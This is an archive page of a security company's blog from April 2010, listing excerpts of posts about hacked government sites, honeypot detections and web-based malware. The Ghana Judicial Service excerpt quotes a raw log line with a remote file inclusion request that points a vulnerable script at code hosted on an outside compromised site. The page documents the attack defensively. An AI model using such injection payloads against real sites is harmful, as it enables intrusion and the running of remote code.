Monthly Archives: April 2010

Brazilian government site hacked

Today our honeypot detected one more .gov site hacked (among the thousands we see daily). This time from the Brazilian government. The site in question is http://www.sefaz.mt.gov.br. We started to see RFI requests trying to use a file placed inside … Read more


Posted in Uncategorized | Tagged , | 2 Comments

Malware hiding from Google

Google is getting pretty good at detecting web-based malware and blacklisting the sites that are hosting it. This means bad business for the attackers (or “hackers”, as the media like the call them) and as a result they are already … Read more


Posted in google, hacked, malware, security, sucuri | Tagged , , , | 3 Comments

Ghana Judicial Service site hacked

Yesterday we started to see RFI attacks against our honeypots using files hosted from http://www.judicial.gov.gh (Ghana’s official Judicial Service site). These are some of the entries we are seeing: a.18.218.14 – – [05/Apr/2010:11:22:26 -0700] “GET //good.php?board.skin.path=http://www.judicial.gov.gh/r00t/idxx.pdf?? HTTP/1.1″ 404 206 “-” … Read more


Posted in Uncategorized | Tagged , | Leave a comment

Targeted web-based malware – Case study

We deal with web-based malware every day here at Sucuri. Most of them are very simple and easy to detect, but once in a while we face some that are very complex and targeted. This case study is about the … Read more


Posted in Uncategorized | Tagged , , , | 3 Comments

ForTransRis hosting malware and attacking our honeypots

ForTransRIS Project is a Coordination Action funded by the European Commission under the OMC-NET (Open Method of Coordination-NET) strategy of the Sixth Framework Programme for Research and Technological Development, managed by the DG Research.. Since last week we are seeing … Read more


Posted in Uncategorized | Tagged , , | 2 Comments

Kernel.org funny April fools joke

We have been monitoring kernel.org (and many other open source projects sites) with our web integrity monitoring solution and I was surprised to see a big change on their site today. It looked like some message in Russian was added … Read more


Posted in Uncategorized | Tagged | 2 Comments